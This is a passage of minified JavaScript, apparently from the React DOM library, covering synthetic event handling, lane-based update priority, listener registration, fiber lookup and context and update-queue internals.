kt={animationend:yt("Animation","AnimationEnd"),animationiteration:yt("Animation","AnimationIteration"),animationstart:yt("Animation","AnimationStart"),transitionend:yt("Transition","TransitionEnd")},Et={},Ct={};function St(e){if(Et[e])return Et[e];if(!kt[e])return e;var t,n=kt[e];for(t in n)if(n.hasOwnProperty(t)&&t in Ct)return Et[e]=n[t];return e}d&&(Ct=document.createElement("div").style,"AnimationEvent"in window||(delete kt.animationend.animation,delete kt.animationiteration.animation,delete kt.animationstart.animation),"TransitionEvent"in window||delete kt.transitionend.transition);var Mt=St("animationend"),Lt=St("animationiteration"),Nt=St("animationstart"),Zt=St("transitionend"),Pt=new Map,zt=new Map,At=["abort","abort",Mt,"animationEnd",Lt,"animationIteration",Nt,"animationStart","canplay","canPlay","canplaythrough","canPlayThrough","durationchange","durationChange","emptied","emptied","encrypted","encrypted","ended","ended","error","error","gotpointercapture","gotPointerCapture","load","load","loadeddata","loadedData","loadedmetadata","loadedMetadata","loadstart","loadStart","lostpointercapture","lostPointerCapture","playing","playing","progress","progress","seeking","seeking","stalled","stalled","suspend","suspend","timeupdate","timeUpdate",Zt,"transitionEnd","waiting","waiting"];function Bt(e,t){for(var n=0;n<e.length;n+=2){var a=e[n],r=e[n+1];r="on"+(r[0].toUpperCase()+r.slice(1)),zt.set(a,t),Pt.set(a,r),p(r,[a])}}(0,o.unstable_now)();var Ht=8;function Tt(e){if(0!=(1&e))return Ht=15,1;if(0!=(2&e))return Ht=14,2;if(0!=(4&e))return Ht=13,4;var t=24&e;return 0!==t?(Ht=12,t):0!=(32&e)?(Ht=11,32):0!=(t=192&e)?(Ht=10,t):0!=(256&e)?(Ht=9,256):0!=(t=3584&e)?(Ht=8,t):0!=(4096&e)?(Ht=7,4096):0!=(t=4186112&e)?(Ht=6,t):0!=(t=62914560&e)?(Ht=5,t):67108864&e?(Ht=4,67108864):0!=(134217728&e)?(Ht=3,134217728):0!=(t=805306368&e)?(Ht=2,t):0!=(1073741824&e)?(Ht=1,1073741824):(Ht=8,e)}function Rt(e,t){var n=e.pendingLanes;if(0===n)return Ht=0;var a=0,r=0,o=e.expiredLanes,i=e.suspendedLanes,l=e.pingedLanes;if(0!==o)a=o,r=Ht=15;else if(0!=(o=134217727&n)){var s=o&~i;0!==s?(a=Tt(s),r=Ht):0!=(l&=o)&&(a=Tt(l),r=Ht)}else 0!=(o=n&~i)?(a=Tt(o),r=Ht):0!==l&&(a=Tt(l),r=Ht);if(0===a)return 0;if(a=n&((0>(a=31-Dt(a))?0:1<<a)<<1)-1,0!==t&&t!==a&&0==(t&i)){if(Tt(t),r<=Ht)return t;Ht=r}if(0!==(t=e.entangledLanes))for(e=e.entanglements,t&=a;0<t;)r=1<<(n=31-Dt(t)),a|=e[n],t&=~r;return a}function Ot(e){return 0!=(e=-1073741825&e.pendingLanes)?e:1073741824&e?1073741824:0}function jt(e,t){switch(e){case 15:return 1;case 14:return 2;case 12:return 0===(e=Vt(24&~t))?jt(10,t):e;case 10:return 0===(e=Vt(192&~t))?jt(8,t):e;case 8:return 0===(e=Vt(3584&~t))&&0===(e=Vt(4186112&~t))&&(e=512),e;case 2:return 0===(t=Vt(805306368&~t))&&(t=268435456),t}throw Error(i(358,e))}function Vt(e){return e&-e}function Ft(e){for(var t=[],n=0;31>n;n++)t.push(e);return t}function Wt(e,t,n){e.pendingLanes|=t;var a=t-1;e.suspendedLanes&=a,e.pingedLanes&=a,(e=e.eventTimes)[t=31-Dt(t)]=n}var Dt=Math.clz32?Math.clz32:function(e){return 0===e?32:31-(It(e)/Ut|0)|0},It=Math.log,Ut=Math.LN2,$t=o.unstable_UserBlockingPriority,Gt=o.unstable_runWithPriority,qt=!0;function Kt(e,t,n,a){Te||Be();var r=Qt,o=Te;Te=!0;try{Ae(r,e,t,n,a)}finally{(Te=o)||Oe()}}function Xt(e,t,n,a){Gt($t,Qt.bind(null,e,t,n,a))}function Qt(e,t,n,a){var r;if(qt)if((r=0==(4&t))&&0<ot.length&&-1<ut.indexOf(e))e=mt(null,e,t,n,a),ot.push(e);else{var o=Jt(e,t,n,a);if(null===o)r&&ft(e,a);else{if(r){if(-1<ut.indexOf(e))return e=mt(o,e,t,n,a),void ot.push(e);if(function(e,t,n,a,r){switch(t){case"focusin":return it=ht(it,e,t,n,a,r),!0;case"dragenter":return lt=ht(lt,e,t,n,a,r),!0;case"mouseover":return st=ht(st,e,t,n,a,r),!0;case"pointerover":var o=r.pointerId;return pt.set(o,ht(pt.get(o)||null,e,t,n,a,r)),!0;case"gotpointercapture":return o=r.pointerId,ct.set(o,ht(ct.get(o)||null,e,t,n,a,r)),!0}return!1}(o,e,t,n,a))return;ft(e,a)}Ha(e,t,a,null,n)}}}function Jt(e,t,n,a){var r=Ce(a);if(null!==(r=nr(r))){var o=Ke(r);if(null===o)r=null;else{var i=o.tag;if(13===i){if(null!==(r=Xe(o)))return r;r=null}else if(3===i){if(o.stateNode.hydrate)return 3===o.tag?o.stateNode.containerInfo:null;r=null}else o!==r&&(r=null)}}return Ha(e,t,a,r,n),null}var Yt=null,en=null,tn=null;function nn(){if(tn)return tn;var e,t,n=en,a=n.length,r="value"in Yt?Yt.value:Yt.textContent,o=r.length;for(e=0;e<a&&n[e]===r[e];e++);var i=a-e;for(t=1;t<=i&&n[a-t]===r[o-t];t++);return tn=r.slice(e,1<t?1-t:void 0)}function an(e){var t=e.keyCode;return"charCode"in e?0===(e=e.charCode)&&13===t&&(e=13):e=t,10===e&&(e=13),32<=e||13===e?e:0}function rn(){return!0}function on(){return!1}function ln(e){function t(t,n,a,r,o){for(var i in this._reactName=t,this._targetInst=a,this.type=n,this.nativeEvent=r,this.target=o,this.currentTarget=null,e)e.hasOwnProperty(i)&&(t=e[i],this[i]=t?t(r):r[i]);return this.isDefaultPrevented=(null!=r.defaultPrevented?r.defaultPrevented:!1===r.returnValue)?rn:on,this.isPropagationStopped=on,this}return r(t.prototype,{preventDefault:function(){this.defaultPrevented=!0;var e=this.nativeEvent;e&&(e.preventDefault?e.preventDefault():"unknown"!=typeof e.returnValue&&(e.returnValue=!1),this.isDefaultPrevented=rn)},stopPropagation:function(){var e=this.nativeEvent;e&&(e.stopPropagation?e.stopPropagation():"unknown"!=typeof e.cancelBubble&&(e.cancelBubble=!0),this.isPropagationStopped=rn)},persist:function(){},isPersistent:rn}),t}var sn,pn,cn,dn={eventPhase:0,bubbles:0,cancelable:0,timeStamp:function(e){return e.timeStamp||Date.now()},defaultPrevented:0,isTrusted:0},un=ln(dn),mn=r({},dn,{view:0,detail:0}),fn=ln(mn),hn=r({},mn,{screenX:0,screenY:0,clientX:0,clientY:0,pageX:0,pageY:0,ctrlKey:0,shiftKey:0,altKey:0,metaKey:0,getModifierState:Ln,button:0,buttons:0,relatedTarget:function(e){return void 0===e.relatedTarget?e.fromElement===e.srcElement?e.toElement:e.fromElement:e.relatedTarget},movementX:function(e){return"movementX"in e?e.movementX:(e!==cn&&(cn&&"mousemove"===e.type?(sn=e.screenX-cn.screenX,pn=e.screenY-cn.screenY):pn=sn=0,cn=e),sn)},movementY:function(e){return"movementY"in e?e.movementY:pn}}),gn=ln(hn),vn=ln(r({},hn,{dataTransfer:0})),wn=ln(r({},mn,{relatedTarget:0})),bn=ln(r({},dn,{animationName:0,elapsedTime:0,pseudoElement:0})),xn=r({},dn,{clipboardData:function(e){return"clipboardData"in e?e.clipboardData:window.clipboardData}}),yn=ln(xn),kn=ln(r({},dn,{data:0})),En={Esc:"Escape",Spacebar:" ",Left:"ArrowLeft",Up:"ArrowUp",Right:"ArrowRight",Down:"ArrowDown",Del:"Delete",Win:"OS",Menu:"ContextMenu",Apps:"ContextMenu",Scroll:"ScrollLock",MozPrintableKey:"Unidentified"},Cn={8:"Backspace",9:"Tab",12:"Clear",13:"Enter",16:"Shift",17:"Control",18:"Alt",19:"Pause",20:"CapsLock",27:"Escape",32:" ",33:"PageUp",34:"PageDown",35:"End",36:"Home",37:"ArrowLeft",38:"ArrowUp",39:"ArrowRight",40:"ArrowDown",45:"Insert",46:"Delete",112:"F1",113:"F2",114:"F3",115:"F4",116:"F5",117:"F6",118:"F7",119:"F8",120:"F9",121:"F10",122:"F11",123:"F12",144:"NumLock",145:"ScrollLock",224:"Meta"},Sn={Alt:"altKey",Control:"ctrlKey",Meta:"metaKey",Shift:"shiftKey"};function Mn(e){var t=this.nativeEvent;return t.getModifierState?t.getModifierState(e):!!(e=Sn[e])&&!!t[e]}function Ln(){return Mn}var Nn=r({},mn,{key:function(e){if(e.key){var t=En[e.key]||e.key;if("Unidentified"!==t)return t}return"keypress"===e.type?13===(e=an(e))?"Enter":String.fromCharCode(e):"keydown"===e.type||"keyup"===e.type?Cn[e.keyCode]||"Unidentified":""},code:0,location:0,ctrlKey:0,shiftKey:0,altKey:0,metaKey:0,repeat:0,locale:0,getModifierState:Ln,charCode:function(e){return"keypress"===e.type?an(e):0},keyCode:function(e){return"keydown"===e.type||"keyup"===e.type?e.keyCode:0},which:function(e){return"keypress"===e.type?an(e):"keydown"===e.type||"keyup"===e.type?e.keyCode:0}}),Zn=ln(Nn),Pn=ln(r({},hn,{pointerId:0,width:0,height:0,pressure:0,tangentialPressure:0,tiltX:0,tiltY:0,twist:0,pointerType:0,isPrimary:0})),zn=ln(r({},mn,{touches:0,targetTouches:0,changedTouches:0,altKey:0,metaKey:0,ctrlKey:0,shiftKey:0,getModifierState:Ln})),An=ln(r({},dn,{propertyName:0,elapsedTime:0,pseudoElement:0})),Bn=r({},hn,{deltaX:function(e){return"deltaX"in e?e.deltaX:"wheelDeltaX"in e?-e.wheelDeltaX:0},deltaY:function(e){return"deltaY"in e?e.deltaY:"wheelDeltaY"in e?-e.wheelDeltaY:"wheelDelta"in e?-e.wheelDelta:0},deltaZ:0,deltaMode:0}),Hn=ln(Bn),Tn=[9,13,27,32],Rn=d&&"CompositionEvent"in window,On=null;d&&"documentMode"in document&&(On=document.documentMode);var jn=d&&"TextEvent"in window&&!On,Vn=d&&(!Rn||On&&8<On&&11>=On),Fn=String.fromCharCode(32),Wn=!1;function Dn(e,t){switch(e){case"keyup":return-1!==Tn.indexOf(t.keyCode);case"keydown":return 229!==t.keyCode;case"keypress":case"mousedown":case"focusout":return!0;default:return!1}}function In(e){return"object"==typeof(e=e.detail)&&"data"in e?e.data:null}var Un=!1,$n={color:!0,date:!0,datetime:!0,"datetime-local":!0,email:!0,month:!0,number:!0,password:!0,range:!0,search:!0,tel:!0,text:!0,time:!0,url:!0,week:!0};function Gn(e){var t=e&&e.nodeName&&e.nodeName.toLowerCase();return"input"===t?!!$n[e.type]:"textarea"===t}function qn(e,t,n,a){Ze(a),0<(t=Ra(t,"onChange")).length&&(n=new un("onChange","change",null,n,a),e.push({event:n,listeners:t}))}var Kn=null,Xn=null;function Qn(e){Na(e,0)}function Jn(e){if(Q(rr(e)))return e}function Yn(e,t){if("change"===e)return t}var ea=!1;if(d){var ta;if(d){var na="oninput"in document;if(!na){var aa=document.createElement("div");aa.setAttribute("oninput","return;"),na="function"==typeof aa.oninput}ta=na}else ta=!1;ea=ta&&(!document.documentMode||9<document.documentMode)}function ra(){Kn&&(Kn.detachEvent("onpropertychange",oa),Xn=Kn=null)}function oa(e){if("value"===e.propertyName&&Jn(Xn)){var t=[];if(qn(t,Xn,e,Ce(e)),e=Qn,Te)e(t);else{Te=!0;try{ze(e,t)}finally{Te=!1,Oe()}}}}function ia(e,t,n){"focusin"===e?(ra(),Xn=n,(Kn=t).attachEvent("onpropertychange",oa)):"focusout"===e&&ra()}function la(e){if("selectionchange"===e||"keyup"===e||"keydown"===e)return Jn(Xn)}function sa(e,t){if("click"===e)return Jn(t)}function pa(e,t){if("input"===e||"change"===e)return Jn(t)}var ca="function"==typeof Object.is?Object.is:function(e,t){return e===t&&(0!==e||1/e==1/t)||e!=e&&t!=t},da=Object.prototype.hasOwnProperty;function ua(e,t){if(ca(e,t))return!0;if("object"!=typeof e||null===e||"object"!=typeof t||null===t)return!1;var n=Object.keys(e),a=Object.keys(t);if(n.length!==a.length)return!1;for(a=0;a<n.length;a++)if(!da.call(t,n[a])||!ca(e[n[a]],t[n[a]]))return!1;return!0}function ma(e){for(;e&&e.firstChild;)e=e.firstChild;return e}function fa(e,t){var n,a=ma(e);for(e=0;a;){if(3===a.nodeType){if(n=e+a.textContent.length,e<=t&&n>=t)return{node:a,offset:t-e};e=n}e:{for(;a;){if(a.nextSibling){a=a.nextSibling;break e}a=a.parentNode}a=void 0}a=ma(a)}}function ha(e,t){return!(!e||!t)&&(e===t||(!e||3!==e.nodeType)&&(t&&3===t.nodeType?ha(e,t.parentNode):"contains"in e?e.contains(t):!!e.compareDocumentPosition&&!!(16&e.compareDocumentPosition(t))))}function ga(){for(var e=window,t=J();t instanceof e.HTMLIFrameElement;){try{var n="string"==typeof t.contentWindow.location.href}catch(e){n=!1}if(!n)break;t=J((e=t.contentWindow).document)}return t}function va(e){var t=e&&e.nodeName&&e.nodeName.toLowerCase();return t&&("input"===t&&("text"===e.type||"search"===e.type||"tel"===e.type||"url"===e.type||"password"===e.type)||"textarea"===t||"true"===e.contentEditable)}var _a=d&&"documentMode"in document&&11>=document.documentMode,wa=null,ba=null,xa=null,ya=!1;function ka(e,t,n){var a=n.window===n?n.document:9===n.nodeType?n:n.ownerDocument;ya||null==wa||wa!==J(a)||(a="selectionStart"in(a=wa)&&va(a)?{start:a.selectionStart,end:a.selectionEnd}:{anchorNode:(a=(a.ownerDocument&&a.ownerDocument.defaultView||window).getSelection()).anchorNode,anchorOffset:a.anchorOffset,focusNode:a.focusNode,focusOffset:a.focusOffset},xa&&ua(xa,a)||(xa=a,0<(a=Ra(ba,"onSelect")).length&&(t=new un("onSelect","select",null,t,n),e.push({event:t,listeners:a}),t.target=wa)))}Bt("cancel cancel click click close close contextmenu contextMenu copy copy cut cut auxclick auxClick dblclick doubleClick dragend dragEnd dragstart dragStart drop drop focusin focus focusout blur input input invalid invalid keydown keyDown keypress keyPress keyup keyUp mousedown mouseDown mouseup mouseUp paste paste pause pause play play pointercancel pointerCancel pointerdown pointerDown pointerup pointerUp ratechange rateChange reset reset seeked seeked submit submit touchcancel touchCancel touchend touchEnd touchstart touchStart volumechange volumeChange".split(" "),0),Bt("drag drag dragenter dragEnter dragexit dragExit dragleave dragLeave dragover dragOver mousemove mouseMove mouseout mouseOut mouseover mouseOver pointermove pointerMove pointerout pointerOut pointerover pointerOver scroll scroll toggle toggle touchmove touchMove wheel wheel".split(" "),1),Bt(At,2);for(var Ea="change selectionchange textInput compositionstart compositionend compositionupdate".split(" "),Ca=0;Ca<Ea.length;Ca++)zt.set(Ea[Ca],0);c("onMouseEnter",["mouseout","mouseover"]),c("onMouseLeave",["mouseout","mouseover"]),c("onPointerEnter",["pointerout","pointerover"]),c("onPointerLeave",["pointerout","pointerover"]),p("onChange","change click focusin focusout input keydown keyup selectionchange".split(" ")),p("onSelect","focusout contextmenu dragend focusin keydown keyup mousedown mouseup selectionchange".split(" ")),p("onBeforeInput",["compositionend","keypress","textInput","paste"]),p("onCompositionEnd","compositionend focusout keydown keypress keyup mousedown".split(" ")),p("onCompositionStart","compositionstart focusout keydown keypress keyup mousedown".split(" ")),p("onCompositionUpdate","compositionupdate focusout keydown keypress keyup mousedown".split(" "));var Sa="abort canplay canplaythrough durationchange emptied encrypted ended error loadeddata loadedmetadata loadstart pause play playing progress ratechange seeked seeking stalled suspend timeupdate volumechange waiting".split(" "),Ma=new Set("cancel close invalid load scroll toggle".split(" ").concat(Sa));function La(e,t,n){var a=e.type||"unknown-event";e.currentTarget=n,function(e,t,n,a,r,o,l,s,p){if(qe.apply(this,arguments),De){if(!De)throw Error(i(198));var c=Ie;De=!1,Ie=null,Ue||(Ue=!0,$e=c)}}(a,t,void 0,e),e.currentTarget=null}function Na(e,t){t=0!=(4&t);for(var n=0;n<e.length;n++){var a=e[n],r=a.event;a=a.listeners;e:{var o=void 0;if(t)for(var i=a.length-1;0<=i;i--){var l=a[i],s=l.instance,p=l.currentTarget;if(l=l.listener,s!==o&&r.isPropagationStopped())break e;La(r,l,p),o=s}else for(i=0;i<a.length;i++){if(s=(l=a[i]).instance,p=l.currentTarget,l=l.listener,s!==o&&r.isPropagationStopped())break e;La(r,l,p),o=s}}}if(Ue)throw e=$e,Ue=!1,$e=null,e}function Za(e,t){var n=ir(t),a=e+"__bubble";n.has(a)||(Ba(t,e,2,!1),n.add(a))}var Pa="_reactListening"+Math.random().toString(36).slice(2);function za(e){e[Pa]||(e[Pa]=!0,l.forEach((function(t){Ma.has(t)||Aa(t,!1,e,null),Aa(t,!0,e,null)})))}function Aa(e,t,n,a){var r=4<arguments.length&&void 0!==arguments[4]?arguments[4]:0,o=n;if("selectionchange"===e&&9!==n.nodeType&&(o=n.ownerDocument),null!==a&&!t&&Ma.has(e)){if("scroll"!==e)return;r|=2,o=a}var i=ir(o),l=e+"__"+(t?"capture":"bubble");i.has(l)||(t&&(r|=4),Ba(o,e,r,t),i.add(l))}function Ba(e,t,n,a){var r=zt.get(t);switch(void 0===r?2:r){case 0:r=Kt;break;case 1:r=Xt;break;default:r=Qt}n=r.bind(null,t,n,e),r=void 0,!Ve||"touchstart"!==t&&"touchmove"!==t&&"wheel"!==t||(r=!0),a?void 0!==r?e.addEventListener(t,n,{capture:!0,passive:r}):e.addEventListener(t,n,!0):void 0!==r?e.addEventListener(t,n,{passive:r}):e.addEventListener(t,n,!1)}function Ha(e,t,n,a,r){var o=a;if(0==(1&t)&&0==(2&t)&&null!==a)e:for(;;){if(null===a)return;var i=a.tag;if(3===i||4===i){var l=a.stateNode.containerInfo;if(l===r||8===l.nodeType&&l.parentNode===r)break;if(4===i)for(i=a.return;null!==i;){var s=i.tag;if((3===s||4===s)&&((s=i.stateNode.containerInfo)===r||8===s.nodeType&&s.parentNode===r))return;i=i.return}for(;null!==l;){if(null===(i=nr(l)))return;if(5===(s=i.tag)||6===s){a=o=i;continue e}l=l.parentNode}}a=a.return}!function(e,t,n){if(Re)return e();Re=!0;try{return He(e,t,n)}finally{Re=!1,Oe()}}((function(){var a=o,r=Ce(n),i=[];e:{var l=Pt.get(e);if(void 0!==l){var s=un,p=e;switch(e){case"keypress":if(0===an(n))break e;case"keydown":case"keyup":s=Zn;break;case"focusin":p="focus",s=wn;break;case"focusout":p="blur",s=wn;break;case"beforeblur":case"afterblur":s=wn;break;case"click":if(2===n.button)break e;case"auxclick":case"dblclick":case"mousedown":case"mousemove":case"mouseup":case"mouseout":case"mouseover":case"contextmenu":s=gn;break;case"drag":case"dragend":case"dragenter":case"dragexit":case"dragleave":case"dragover":case"dragstart":case"drop":s=vn;break;case"touchcancel":case"touchend":case"touchmove":case"touchstart":s=zn;break;case Mt:case Lt:case Nt:s=bn;break;case Zt:s=An;break;case"scroll":s=fn;break;case"wheel":s=Hn;break;case"copy":case"cut":case"paste":s=yn;break;case"gotpointercapture":case"lostpointercapture":case"pointercancel":case"pointerdown":case"pointermove":case"pointerout":case"pointerover":case"pointerup":s=Pn}var c=0!=(4&t),d=!c&&"scroll"===e,u=c?null!==l?l+"Capture":null:l;c=[];for(var m,f=a;null!==f;){var h=(m=f).stateNode;if(5===m.tag&&null!==h&&(m=h,null!==u&&null!=(h=je(f,u))&&c.push(Ta(f,h,m))),d)break;f=f.return}0<c.length&&(l=new s(l,p,null,n,r),i.push({event:l,listeners:c}))}}if(0==(7&t)){if(s="mouseout"===e||"pointerout"===e,(!(l="mouseover"===e||"pointerover"===e)||0!=(16&t)||!(p=n.relatedTarget||n.fromElement)||!nr(p)&&!p[er])&&(s||l)&&(l=r.window===r?r:(l=r.ownerDocument)?l.defaultView||l.parentWindow:window,s?(s=a,null!==(p=(p=n.relatedTarget||n.toElement)?nr(p):null)&&(p!==(d=Ke(p))||5!==p.tag&&6!==p.tag)&&(p=null)):(s=null,p=a),s!==p)){if(c=gn,h="onMouseLeave",u="onMouseEnter",f="mouse","pointerout"!==e&&"pointerover"!==e||(c=Pn,h="onPointerLeave",u="onPointerEnter",f="pointer"),d=null==s?l:rr(s),m=null==p?l:rr(p),(l=new c(h,f+"leave",s,n,r)).target=d,l.relatedTarget=m,h=null,nr(r)===a&&((c=new c(u,f+"enter",p,n,r)).target=m,c.relatedTarget=d,h=c),d=h,s&&p)e:{for(u=p,f=0,m=c=s;m;m=Oa(m))f++;for(m=0,h=u;h;h=Oa(h))m++;for(;0<f-m;)c=Oa(c),f--;for(;0<m-f;)u=Oa(u),m--;for(;f--;){if(c===u||null!==u&&c===u.alternate)break e;c=Oa(c),u=Oa(u)}c=null}else c=null;null!==s&&ja(i,l,s,c,!1),null!==p&&null!==d&&ja(i,d,p,c,!0)}if("select"===(s=(l=a?rr(a):window).nodeName&&l.nodeName.toLowerCase())||"input"===s&&"file"===l.type)var g=Yn;else if(Gn(l))if(ea)g=pa;else{g=la;var v=ia}else(s=l.nodeName)&&"input"===s.toLowerCase()&&("checkbox"===l.type||"radio"===l.type)&&(g=sa);switch(g&&(g=g(e,a))?qn(i,g,n,r):(v&&v(e,l,a),"focusout"===e&&(v=l._wrapperState)&&v.controlled&&"number"===l.type&&re(l,"number",l.value)),v=a?rr(a):window,e){case"focusin":(Gn(v)||"true"===v.contentEditable)&&(wa=v,ba=a,xa=null);break;case"focusout":xa=ba=wa=null;break;case"mousedown":ya=!0;break;case"contextmenu":case"mouseup":case"dragend":ya=!1,ka(i,n,r);break;case"selectionchange":if(_a)break;case"keydown":case"keyup":ka(i,n,r)}var _;if(Rn)e:{switch(e){case"compositionstart":var w="onCompositionStart";break e;case"compositionend":w="onCompositionEnd";break e;case"compositionupdate":w="onCompositionUpdate";break e}w=void 0}else Un?Dn(e,n)&&(w="onCompositionEnd"):"keydown"===e&&229===n.keyCode&&(w="onCompositionStart");w&&(Vn&&"ko"!==n.locale&&(Un||"onCompositionStart"!==w?"onCompositionEnd"===w&&Un&&(_=nn()):(en="value"in(Yt=r)?Yt.value:Yt.textContent,Un=!0)),0<(v=Ra(a,w)).length&&(w=new kn(w,e,null,n,r),i.push({event:w,listeners:v}),(_||null!==(_=In(n)))&&(w.data=_))),(_=jn?function(e,t){switch(e){case"compositionend":return In(t);case"keypress":return 32!==t.which?null:(Wn=!0,Fn);case"textInput":return(e=t.data)===Fn&&Wn?null:e;default:return null}}(e,n):function(e,t){if(Un)return"compositionend"===e||!Rn&&Dn(e,t)?(e=nn(),tn=en=Yt=null,Un=!1,e):null;switch(e){case"paste":default:return null;case"keypress":if(!(t.ctrlKey||t.altKey||t.metaKey)||t.ctrlKey&&t.altKey){if(t.char&&1<t.char.length)return t.char;if(t.which)return String.fromCharCode(t.which)}return null;case"compositionend":return Vn&&"ko"!==t.locale?null:t.data}}(e,n))&&0<(a=Ra(a,"onBeforeInput")).length&&(r=new kn("onBeforeInput","beforeinput",null,n,r),i.push({event:r,listeners:a}),r.data=_)}Na(i,t)}))}function Ta(e,t,n){return{instance:e,listener:t,currentTarget:n}}function Ra(e,t){for(var n=t+"Capture",a=[];null!==e;){var r=e,o=r.stateNode;5===r.tag&&null!==o&&(r=o,null!=(o=je(e,n))&&a.unshift(Ta(e,o,r)),null!=(o=je(e,t))&&a.push(Ta(e,o,r))),e=e.return}return a}function Oa(e){if(null===e)return null;do{e=e.return}while(e&&5!==e.tag);return e||null}function ja(e,t,n,a,r){for(var o=t._reactName,i=[];null!==n&&n!==a;){var l=n,s=l.alternate,p=l.stateNode;if(null!==s&&s===a)break;5===l.tag&&null!==p&&(l=p,r?null!=(s=je(n,o))&&i.unshift(Ta(n,s,l)):r||null!=(s=je(n,o))&&i.push(Ta(n,s,l))),n=n.return}0!==i.length&&e.push({event:t,listeners:i})}function Va(){}var Fa=null,Wa=null;function Da(e,t){switch(e){case"button":case"input":case"select":case"textarea":return!!t.autoFocus}return!1}function Ia(e,t){return"textarea"===e||"option"===e||"noscript"===e||"string"==typeof t.children||"number"==typeof t.children||"object"==typeof t.dangerouslySetInnerHTML&&null!==t.dangerouslySetInnerHTML&&null!=t.dangerouslySetInnerHTML.__html}var Ua="function"==typeof setTimeout?setTimeout:void 0,$a="function"==typeof clearTimeout?clearTimeout:void 0;function Ga(e){(1===e.nodeType||9===e.nodeType&&null!=(e=e.body))&&(e.textContent="")}function qa(e){for(;null!=e;e=e.nextSibling){var t=e.nodeType;if(1===t||3===t)break}return e}function Ka(e){e=e.previousSibling;for(var t=0;e;){if(8===e.nodeType){var n=e.data;if("$"===n||"$!"===n||"$?"===n){if(0===t)return e;t--}else"/$"===n&&t++}e=e.previousSibling}return null}var Xa=0,Qa=Math.random().toString(36).slice(2),Ja="__reactFiber$"+Qa,Ya="__reactProps$"+Qa,er="__reactContainer$"+Qa,tr="__reactEvents$"+Qa;function nr(e){var t=e[Ja];if(t)return t;for(var n=e.parentNode;n;){if(t=n[er]||n[Ja]){if(n=t.alternate,null!==t.child||null!==n&&null!==n.child)for(e=Ka(e);null!==e;){if(n=e[Ja])return n;e=Ka(e)}return t}n=(e=n).parentNode}return null}function ar(e){return!(e=e[Ja]||e[er])||5!==e.tag&&6!==e.tag&&13!==e.tag&&3!==e.tag?null:e}function rr(e){if(5===e.tag||6===e.tag)return e.stateNode;throw Error(i(33))}function or(e){return e[Ya]||null}function ir(e){var t=e[tr];return void 0===t&&(t=e[tr]=new Set),t}var lr=[],sr=-1;function pr(e){return{current:e}}function cr(e){0>sr||(e.current=lr[sr],lr[sr]=null,sr--)}function dr(e,t){sr++,lr[sr]=e.current,e.current=t}var ur={},mr=pr(ur),fr=pr(!1),hr=ur;function gr(e,t){var n=e.type.contextTypes;if(!n)return ur;var a=e.stateNode;if(a&&a.__reactInternalMemoizedUnmaskedChildContext===t)return a.__reactInternalMemoizedMaskedChildContext;var r,o={};for(r in n)o[r]=t[r];return a&&((e=e.stateNode).__reactInternalMemoizedUnmaskedChildContext=t,e.__reactInternalMemoizedMaskedChildContext=o),o}function vr(e){return null!=e.childContextTypes}function _r(){cr(fr),cr(mr)}function wr(e,t,n){if(mr.current!==ur)throw Error(i(168));dr(mr,t),dr(fr,n)}function br(e,t,n){var a=e.stateNode;if(e=t.childContextTypes,"function"!=typeof a.getChildContext)return n;for(var o in a=a.getChildContext())if(!(o in e))throw Error(i(108,G(t)||"Unknown",o));return r({},n,a)}function xr(e){return e=(e=e.stateNode)&&e.__reactInternalMemoizedMergedChildContext||ur,hr=mr.current,dr(mr,e),dr(fr,fr.current),!0}function yr(e,t,n){var a=e.stateNode;if(!a)throw Error(i(169));n?(e=br(e,t,hr),a.__reactInternalMemoizedMergedChildContext=e,cr(fr),cr(mr),dr(mr,e)):cr(fr),dr(fr,n)}var kr=null,Er=null,Cr=o.unstable_runWithPriority,Sr=o.unstable_scheduleCallback,Mr=o.unstable_cancelCallback,Lr=o.unstable_shouldYield,Nr=o.unstable_requestPaint,Zr=o.unstable_now,Pr=o.unstable_getCurrentPriorityLevel,zr=o.unstable_ImmediatePriority,Ar=o.unstable_UserBlockingPriority,Br=o.unstable_NormalPriority,Hr=o.unstable_LowPriority,Tr=o.unstable_IdlePriority,Rr={},Or=void 0!==Nr?Nr:function(){},jr=null,Vr=null,Fr=!1,Wr=Zr(),Dr=1e4>Wr?Zr:function(){return Zr()-Wr};function Ir(){switch(Pr()){case zr:return 99;case Ar:return 98;case Br:return 97;case Hr:return 96;case Tr:return 95;default:throw Error(i(332))}}function Ur(e){switch(e){case 99:return zr;case 98:return Ar;case 97:return Br;case 96:return Hr;case 95:return Tr;default:throw Error(i(332))}}function $r(e,t){return e=Ur(e),Cr(e,t)}function Gr(e,t,n){return e=Ur(e),Sr(e,t,n)}function qr(){if(null!==Vr){var e=Vr;Vr=null,Mr(e)}Kr()}function Kr(){if(!Fr&&null!==jr){Fr=!0;var e=0;try{var t=jr;$r(99,(function(){for(;e<t.length;e++){var n=t[e];do{n=n(!0)}while(null!==n)}})),jr=null}catch(t){throw null!==jr&&(jr=jr.slice(e+1)),Sr(zr,qr),t}finally{Fr=!1}}}var Xr=x.ReactCurrentBatchConfig;function Qr(e,t){if(e&&e.defaultProps){for(var n in t=r({},t),e=e.defaultProps)void 0===t[n]&&(t[n]=e[n]);return t}return t}var Jr=pr(null),Yr=null,eo=null,to=null;function no(){to=eo=Yr=null}function ao(e){var t=Jr.current;cr(Jr),e.type._context._currentValue=t}function ro(e,t){for(;null!==e;){var n=e.alternate;if((e.childLanes&t)===t){if(null===n||(n.childLanes&t)===t)break;n.childLanes|=t}else e.childLanes|=t,null!==n&&(n.childLanes|=t);e=e.return}}function oo(e,t){Yr=e,to=eo=null,null!==(e=e.dependencies)&&null!==e.firstContext&&(0!=(e.lanes&t)&&(Ri=!0),e.firstContext=null)}function io(e,t){if(to!==e&&!1!==t&&0!==t)if("number"==typeof t&&1073741823!==t||(to=e,t=1073741823),t={context:e,observedBits:t,next:null},null===eo){if(null===Yr)throw Error(i(308));eo=t,Yr.dependencies={lanes:0,firstContext:t,responders:null}}else eo=eo.next=t;return e._currentValue}var lo=!1;function so(e){e.updateQueue={baseState:e.memoizedState,firstBaseUpdate:null,lastBaseUpdate:null,shared:{pending:null},effects:null}}function po(e,t){e=e.updateQueue,t.updateQueue===e&&(t.updateQueue={baseState:e.baseState,firstBaseUpdate:e.firstBaseUpdate,lastBaseUpdate:e.lastBaseUpdate,shared:e.shared,effects:e.effects})}function co(e,t){return{eventTime:e,lane:t,tag:0,payload:null,callback:null,next:null}}function uo(e,t){if(null!==(e=e.updateQueue)){var n=(e=e.shared).pending;null===n?t.next=t:(t.next=n.next,n.next=t),e.pending=t}}function mo(e,t){var n=e.updateQueue,a=e.alternate;if(null!==a&&n===(a=a.updateQueue)){var r=null,o=null;if(null!==(n=n.firstBaseUpdate)){do{var 